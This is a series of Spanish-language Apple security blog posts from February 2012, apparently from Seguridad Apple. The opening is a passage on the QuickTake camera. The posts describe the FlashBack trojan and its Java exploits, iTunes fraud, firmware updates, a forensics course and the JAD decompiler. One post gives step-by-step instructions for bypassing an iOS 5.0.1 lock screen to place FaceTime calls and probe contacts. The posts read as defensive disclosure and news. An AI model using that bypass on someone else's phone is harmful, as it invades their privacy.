Estas pesadas reliquias fueron retiradas del mercado en 1997, entre otros motivos porque su coste, de unos 700$, era muy elevado para la época. Hoy en día, aunque han aparecido en listas de grandes fracasos tecnológicos en diversas ocasiones, estos gadgets de los 90 siguen despertando simpatías entre los fans de Apple y los adictos a la fotografía digital .

Apple QuickTake 150

Para nostálgicos tenéis unos ejemplos de fotos tomadas con una Apple Quicktake 150 en CityNoise y podréis comprobar como el avance respecto a la digitalización de que se obtenía con el DS-65 DigiSelector de Apple es considerable. Si queréis compraros alguna podéis encontrar algunas en Ebay pero ojo estos modelos no soportan Mac OS X, y si necesitas los drivers puedes localizarlos en MacDriverMuseum.

FlashBack Trojan infecta Mac OS X sin intervenir usuario

noreply@blogger.com (SeguridadApple) — Mon, 13 Feb 2012 06:22:00 +0000

FlashBack Trojan es un malware que empezó a explotarse durante el mes de Septiembre de 2011. Recibió el nombre de FlashBack porque utilizaba como gancho para colarse dentro del sistema un truco de ingeniería social, simulando ser el instalador de Adobe Flash para Mac OS X.

Continuó su evolución a lo largo de los meses siguientes, convirtiéndose en un malware mucho más dañino, y en la última versión ha seguido ese proceso.

- FlashBack: Ahora troyaniza Apple Safari
- FlashBack.c: Detecta máquinas virtuales y anula XProtect
- FlashBack: Uso de cifrado RC4 con Hashes MD5 del identificador de usuario
- FlashBack.j: Evolución para evitar nueva firma de XProtect

Desde Intego han reportado que las nuevas versiones de FlashBack Trojan están utilizando dos vulnerabilidades de Java para instalarse en equipos Mac OS X con la versión de Java sin actualizar sin ninguna interacción con el usuario.

En noviembre Apple sacó una actualización de seguridad crítica de Java para Mac OS X en la que parcheaba 17 vulnerabilidades. Rápidamente algunas de ellas se hicieron muy populares debido a la facilidad de explotación y su consistencia, como el exploit Java Rhino que saca partido a la vulnerabilidad con CVE-2011-3544 y que fue incluido en Metasploit. Sin embargo, como era de esperar, no tardo mucho en aparecer este exploit en los kits de explotación, para atacar a sistemas sin actualizar. De ahí, a terminar en los paquetes de distribución de malware conocido era un paso, ya que estos se basan en la misma filosofía de los kits de explotación.

Figura 1: Certificado digital autofirmado usado por FlashBack Trojan

Sin embargo, la evolución de FlashBack Trojan no se ha quedado sólo en el uso de los bugs de Java, sino que también ha modificado su comportamiento para, en caso de no estar instalado Java o estar parcheado, engañar al usuario mediante la ejecución de un código autofirmado por un supuesto certificado digital de Apple, como se puede ver en la Figura 1. Sea por el medio que sea, una vez infectado el equipo, el malware se descarga en /tmp, se da permisos de ejecución y se instala.

Para prevenir este tipo de amenazas te recomendamos que compruebes que tu sistema está totalmente actualizado, recuerda que puedes comprobar que tienes la última versión de Java instalada, y que para los usuarios de sistemas operativos Mac OS X Leopard o Mac OS X Tiger, Apple no ofrece ningún parche de seguridad para Java, luego la responsabilidad de defender el sistema es sólo vuestra. Así que tenéis que actualizar manualmente la máquina de Java desde los repositorios oficiales e instalar una solución antimalware para mitigar ne la medida de lo posible estas amenazas.

Fue noticia en Seguridad Apple: del 30 de Enero al 12 de Febrero

noreply@blogger.com (SeguridadApple) — Sun, 12 Feb 2012 06:25:00 +0000

Hoy Domingo toca resumen de actividad de estas dos últimas dos semanas, así que vamos a empezar con lo que nos ha llamado suficientemente la atención como para publicarlo aquí, en Seguridad Apple.

Comenzamos el 30 de Enero con un artículo en el que nos quejamos de la poca información que ofrecen los servicios de Mac OS X cuando quieren acceder a un keychain para usar una credencial. Actualmente sólo se obtiene el nombre del ejecutable y un mensaje de ayuda genérico sobre los servicios, lo que da poca información a un usuario, lo que abre siempre puertas a los atacantes.

El último día de enero nos encontramos con actualizaciones de los productos AirPott de Apple, con nuevas actualizaciones y una nueva versión de AirPort Utility 6.0 para Mac OS X.

El día 1 de Febrero le tocó el turno a una prueba de concepto sobre cómo saltarse el bloqueo de LockDown Pro mediante el envío de una llamada al número de teléfono que se quiere desbloquear. Demasiado sencillo como para que LockDown Pro tenga utilidad conocido este bug.

El día 2 llegaron la actualización del sistema Mac OS X Lion 10.7.3 y la actualización de seguridad para Mac OS X Snow Leopard 2012-001 con un pequeño update de Safari a la versión 5.1.3. Pero no vinieron solas, ya que junto a ellas vino Apple Remote Desktop 3.5.2 y Server Admin Tools 10.7.3.

El viernes 3 de febrero hablamos del anuncio de la empresa Passware de que era capaz de descifrar FileVault de Mac OS X Snow Leopard y FileVault 2 de Mac OS X Lion en menos de 40 minutos mediante un ataque a un equipo encendido, lo que rompería la seguridad de todos los sistemas que estuvieran suspendidos en lugar de apagados.

Ese mismo día, algo de humor, una comparación entre los antiguos teléfonos Nokia y un terminal iPhone. Es antigua, pero nos hizo mucha gracia al volver a verla años después.

Para el sábado dejamos una pequeña lista de los problemas que generaron las actualizaciones de Mac OS X. Mac OS X Lion 10.7.3 en algunos equipos dejó sin funcionar todas las aplicaciones y hubo que buscar soluciones alternativas de soporte bastante complejas. Mac OS X Snow Leopard con la Security Update 2012-001 rompió Rosetta y hasta salió un parche de la comunidad, llamado Rosetta Fix, antes de que Apple re-publicara el Security Update 2012-001. Para algunos empieza a ser una lotería actualizar el sistema Mac OS X.

El lunes 6 de Febrero hicimos una reseña a la utilidad Jad, un decompilador de Java que permite hacer análisis de código a aplicaciones Java, tanto de escritorio como Applets. Una herramienta que siempre debes tener a mano.

El martes os dejamos tres tips para configurar las actualizaciones de software en Mac OS X. Tres ideas para evitar que se descarguen paquetes de gran tamaño en momentos poco apropiados, para saber qué software está actualizado y para revisar en el acto el software disponible en los servidores de Apple.

El miércoles os informamos del estado de plazas en el RootedLab de Análisis forense de iDevices (iPhone, iPad e iPod Touch) que va a impartir nuestro compañero Juan Garrido "Silverhack". Aún puedes reservar la tuya.

El 9 de Febrero segunda oleada de actualizaciones de firmware para más modelos Mac del año 2010 con el objetivo de dotarles también de soporte para Lion Internet Revovery. Hay que tener presente que tanto en estas updates como en las anteriores, algunas de ellas solucionaban fallos de funcionamiento, por lo que hay que actualizar en cuanto se pueda para solucinarlos.

Ese mismo día salto a la luz un bug de iOS 5.0.1 que permite a un atacante, aun con el iPhone bloquedado por código, realizar llamadas por medio de FaceTime usando el control de voz en llamadas de emergencia. Además de ese fallo, también se puede inspeccionar la lista de contactos en la agenda, o poner música.

El viernes 10 nuestra reseña fue para un artículo de The Global Mail en el que constata que las mafias siguen campando en iTunes y robando dinero a los clientes. Algo que ya habíamos comentado hace un año y que Apple aún no ha podido detener de forma taxativa.

Por último, ayer sábado os trajimos la simpática noticia de la creación de PlayMobil de una auténtica Apple Store para que con tus Clicks prepares el lanzamiento de iPad 3.

Y esto ha sido todo, que como veis no ha sido poco. Esperamos que con este resumen puedas estar al día de todo lo acaecido y que te permita de un vistazo mantenerte al día sobre la actualidad de seguridad alrededor de las tecnologías Apple.

Ya puedes comprarte tu Apple Store de Playmobil y jugar

noreply@blogger.com (SeguridadApple) — Sat, 11 Feb 2012 06:22:00 +0000

La verdad es que nos ha sacado una buena sonrisa ver este juguete para que les montes a tus Clicks su propia Apple Store. Así, puedes recrear tus momentos más estelares con el lanzamiento de iPhone 4S o imaginar como será el de iPad 3.

Figura 1: La Apple Store de Playmobil en Think Geek

El número de accesorios es grande, e incluso hay algunos muñecos que mantienen la estética de Steve Jobs hablando en el teatro.

Figura 2: Ambientes de la Apple Store

El caso es que la diversión no tiene que parar, así que puedes pasar horas con ello. Mira este vídeo y toma ideas.

Disfruta el fin de semana que tenemos.

Las mafias siguen haciendo su negocio en iTunes

noreply@blogger.com (SeguridadApple) — Fri, 10 Feb 2012 06:29:00 +0000

Hace ya casi un año publicamos en Seguridad Apple un artículo titulado "El negocio de las mafias que hacen dinero por iTunes" en el que recogíamos los trucos que usan las mafias del cibercrimen para ganar dinero robando cuentas de iTunes de distintas maneras. Robar cuentas de usuario y gastar los bonos regalos en comprar aplicaciones fraudulentas de la mafia, crear aplicaciones inútiles con el único objetivo de blanquear dinero y cuyos compradores son personas ficticias que usan dinero del cibercrimen o desarrollar malware especial para capturar las cuentas de los usuarios de iTunes es su día a día.

Apple lleva sufriendo este problema desde hace bastante tiempo, y un informe publicado en The Global Mail titulado "Hacking Worm Holes in iTunes" ha puesto de manifiesto que esto sigue siendo así. Usuarios desde el año 2010 reportan como han sufrido robos de dinero, manipulación de compras y de datos en sus perfiles de usuario por atacantes.

Los testimonios de muchos de ellos pueden verse por todo Internet, pero en el propio foro de Discussions de Apple es posible leer, en el hilo "iTunes Store Account Hacked" las experiencias de muchos de ellos en una compilación que alcanza ahora mismo las 73 páginas.

En los comentarios de las víctimas se pueden leer las citas que The Global Mail ha extraído en su artículo en las que explican qué les pasó exactamente y cómo Apple se hizo cargo de todo porque son conscientes de este problema. Si embargo, muchos usuarios se quejan de que no han recibido ninguna explicación clara de qué ha pasado con su cuenta de manera oficial.

El cibercrimen está muy organizado y avanzado desde hace mucho tiempo por lo que te recomendamos que tengas especial cuidado con tus credenciales de iTunes, no usándolas nada más que en tu equipo personal y teniendo especial cuidado en la seguridad del mismo.

Un Bug en iOS 5.0.1 permite hacer llamadas FaceTime desde panel de emergencia en iPhones 4 y 4S bloqueados

noreply@blogger.com (SeguridadApple) — Thu, 09 Feb 2012 15:00:00 +0000

Figura 1: Llamando por FaceTime
en un iPhone bloqueado

Un nuevo fallo parecido a otros del pasado ha sido descubierto en la última versión de iOS 5.0.1 que permite a cualquiera hacer una llamada por FaceTime usando el panel de llamada de emergencia en un teléfono iPhone 4 o iPhone 4S aunque éste tenga bloqueado el acceso por código y desactivado el control de voz.

El proceso para probarlo es bastante sencillo, ya que basta con que sigas estos pasos:

1.- Bloquea tu iPhone con un código de acceso.
2.- En el panel de introducción de código selecciona llamada de emergencia.
3.- En el panel de llamada de emergencia activa el control de voz dejando pulsado el botón de opción tres segundos.
4.- Una vez allí, si quieres descubrir nombres en la agenda de contactos di el nombre de la persona. No permitirá llamar, pero sí conocer si un determinado nombre está en la agenda de contacto.
5.- Genera una llamada de FaceTime diciendo FaceTime y el nombre del contacto.

El bug fue descubierto por un escritor tecnológico canadiense llamado Ade Barkah y ya ha dado la vuelta al mundo, así que Apple tendrá que anotarse este bug para solucionar en la próxima actualización del terminal.

Apple añade soporte de Lion Internet Recovery a más Macs

noreply@blogger.com (SeguridadApple) — Thu, 09 Feb 2012 07:33:00 +0000

A finales de Enero Apple actualizó el firmware de parte de la gama soportada de equipos Mac para dar soporte a Lion Internet Recovery, y ahora continua con el proceso de dotar a todos los equipos aún mantenidos por la compañía de esta misma característica.

Figura 1: Equipos actulizados

Los equipos actualizados son:

- MacBook Pro de principios de 2010: MacBook Pro EFI Firmware 2.6
- iMac de mediados de 2010: iMac EFI Update 1.8
- MacBook Air de finales de 2010: MacBook Air EFI Firmware Update 2.3

En el caso de los MacBook Air, además se soluciona un fallo que se produce cuando se pulsa el botón de encendido nada más despertar de una suspensión. En todos los casos se añade la funcionalidad de Lion Internet Recovery, que permite arrancar la recuperación del sistema desde los servidores Apple.

Quedan 4 plazas en el RootedLab de Análisis Forense iOS

noreply@blogger.com (SeguridadApple) — Wed, 08 Feb 2012 07:04:00 +0000

Como ya os habíamos anticipado, Juan Garrido "Silverhack", analista forense, especialista en seguridad informática y hacking, autor del libro "Análisis Forense Digital en entornos Windows", y responsable de los servicios de Análisis forense de dispositivos móviles y Borrado seguro de datos en dispositivos móviles, en la próxima RootedCON 2012, un RootedLab de 8 horas centrado en el análisis forense de dispositivos móviles de Apple, los iDevices a un grupo máximo de 12 alumnos en Madrid, donde se podrá ver cuál es el proceso y las herramientas que se pueden utilizar para conocer lo que ha sucedido en la vida de un iDevice a lo largo de su uso.

El curso se realizará en Madrid, el día 28 de Febrero de 2012 y de las 12 plazas ya sólo quedan disponibles 4 plazas para apuntarse, por lo que si estás pensando en aprender a realizar un análisis forense a dispositivos Apple, éste es el momento para que reserves la tuya. Tienes toda la información de horarios y registros en la web de los RootedLabs. En el precio de 200 € del seminario se incluye el desayuno y la comida conjunta con ponentes y asitentes. Los contenidos del curso son:

Descripción: Cada vez los dispositivos móviles de Apple son más importantes en nuestro día a día, llamadas, agendas, notas y fotografías, pueden ser utilizados para cometer un delito o fraude. Este Training proporciona los conocimientos y las habilidades necesarias para llevar a cabo una investigación sobre terminales Apple mediante diversas herramientas. Los alumnos adquirirán experiencia práctica con las imágenes del teléfono y el análisis de tarjetas SIM y tarjetas de memoria.

Audiencia: Analistas forenses, técnicos de seguridad y cualquier persona con interés en la seguridad informática.

Objetivos: El objetivo de este curso es dotar a los alumnos de los conocimientos, procedimientos y herramientas para los dispositivos móviles más utilizados hoy de Apple: iPhone, iPad y iPod Touch.

Contenidos:

1. Telefonía Móvil

1.1. Introducción a la telefonía móvil

1.2. Consideraciones legales en España

1.3. Como iniciar un proceso forense

2. Tarjetas SIM

2.1. Creación de un entorno de laboratorio

2.2. Tarjetas SIM

2.3. Análisis de tarjetas SIM

2.4. Clonadoras de SIM y dispositivos

3. Análisis de Herramientas

3.1. Forense de Dispositivos móviles

3.2. Utilización de Bitpim

3.3. Utilidades Device Seizure

3.4. Oxygen Forensics

4. Análisis de dispositivos Apple

4.1. Versiones de iOS

4.1.1 Principales vulnerabilidades y cambios en versiones

4.2. Estructura de ficheros y protección del sistema

4.3. Backups de iOS vía iTunes

4.4. Archivos de datos

4.5. Apple Safari en iOS

4.6. Aplicativos más comunes en sistemas iOS

5. Oxygen Forensics for iOS

5.1 Versiones

5.2 Realización de un análisis completo de un iPhone

5.3. Reporting

Configuración de actualizaciones en Mac OS X: Tres tips

noreply@blogger.com (SeguridadApple) — Tue, 07 Feb 2012 06:59:00 +0000

Las actualizaciones de Mac OS X vienen pre-configuradas por defecto para ayudar a los usuarios a que el sistema se encuentre actualizado y parcheados los fallos de seguridad. Sin embargo hay tres aspectos que debes tener presente de las actualizaciones de software que queremos recordarte que pueden afectar al usuario en algún determinado momento.

1.- "No me ha salido la actualización de seguridad esa que dices que tengo que instalar"

En algunas ocasiones la planificación de actualizaciones puede haberse configurado para buscar semanalmente o directamente se haya deschequeado el selector de buscar actualizaciones. No pasa nada, a parte de configura la planificación desde el botón Panel de Preferencias -> Actualización de Software, puedes usar el botón de "Buscar ahora" para forzar la comprobación en el momento.

Figura 1: Configuración de la planificación de actualizaciones

2.- "Mi conexión a Internet va muy mal"

Ten cuidado con la opción de descargar actualizaciones automáticamente que se puede seleccionar el panel de configuración de las búsquedas programadas. Si acostumbras a estar con conexiones 3G, Edge o de poco ancho de banda, una actualización de software como la de GarageBand podría arruinarte un poco el trabajo. Aunque el sistema hace un consumo eficiente de la red, es preferible controlar el proceso de descarga.

Figura 2: Actualizaciones de gran tamaño pueden llegar vía Software Update

3.- "No sé si en mi equipo está instalado ese parche"

En cualquier momento puedes repasar las versiones de todos los productos de Apple que hayas descargado, incluso si no lo has hecho vía Software Update, y ver las versiones que has ido aplicando y en qué momento, desde el botón de "Software instalado".

Figura 3: Software instalado en tu equipo de Apple

Esperamos que estos tres consejos os hayan venido bien para controlar mejora las actualizaciones de vuestro Mac OS X.

JAD: Un decompilador de Java para Mac OS X

noreply@blogger.com (SeguridadApple) — Mon, 06 Feb 2012 07:05:00 +0000

Recientemente ha habido que mirar la seguridad de un Applet Java, y ha hecho falta buscar un decompilador que nos permitiera analizar el código fuente original para ver si había algún elemento destacable relativo a la seguridad. Así que ha habido que probar varios, para al final terminar trabajando con Jad, una utilidad muy cómoda que ya forma parte de los comandos del sistema en nuestros equipos.

Jad es un proyecto que programó Pavel Kouznetsov, pero que desde el 2001 está abandonado, y hay que buscarlo en mirrors o webs de gente que lo mantiene. En este caso, en un mirror mantenido por Tomas Varaneckas, además de versiones para Linux, Solaris o Windows entre otros, es posible acceder a las siguientes versiones para Mac OS X.

Jad 1.5.8g para Mac OS X 10.4.6 (Intel) (170707 bytes) (Con GCC 4.0)
Jad 1.5.8c para Mac OS X (Darwin 1.3) (PowerPC) (266264 bytes)
Jad 1.5.7b para Mac OS X (Rhapsody 5.3) (PowerPC) (372317 bytes)

La versión Jad 1.5.8g funciona perfectamente en sistemas Mac OS X Lion 10.7.X, así que es probable que en las versiones anteriores también lo haga.

Figura 1: Código decompilado generado por Jad

Jad es extremadamente sencillo de utilizar y a la vez flexible en los resultados que se quieren generar. Al final, lo que hace es interpretar los bytecodes de los ficheros .class en lenguaje Java de alto nivel, para lo que genera un fichero de salida, por defecto con extensión .jad. La forma en la que se quiere generar ese fichero se puede hacer por modificadores, pudiendo elegir desde el tamaño de las constantes alfanuméricas, el formato de la identación o hasta si se quieren las instrucciones de la JVM en forma de comentarios para un análisis de ingeniería inversa más profunda.

Un ejemplo rápido con Applet

Sólo como un ejemplo rápido de cómo usar el programa, basta con descargarse un Applet Java, en este caso en formato .jar (Java Archiver) y extraer los ficheros .class de él. Para ello es suficiente con utilizar cualquier descompresor que interprete ficheros pk. Una vez extraídos los ficheros .class, se puede utilizar Jad para generar un fichero .jad con el código fuente asociado a cada fichero .class.

Figura 2: Decompilando todos los archivos de un Applet con Jad

Después, el trabajo es para el analista que deberá ir buscando el hilo por el que empezar a analizar el código fuente del programa. Una opción sencilla es buscar cadenas con grep en todos los ficheros .jad, para saber dónde se encuentra "la chicha".

Figura 3: Buscando cadenas en los ficheros decompilados para encontrar la pista

Al final, Jad es una buena utilidad de bolsillo que llevar encima por si nos encontramos un entorno en el que nos haga falta.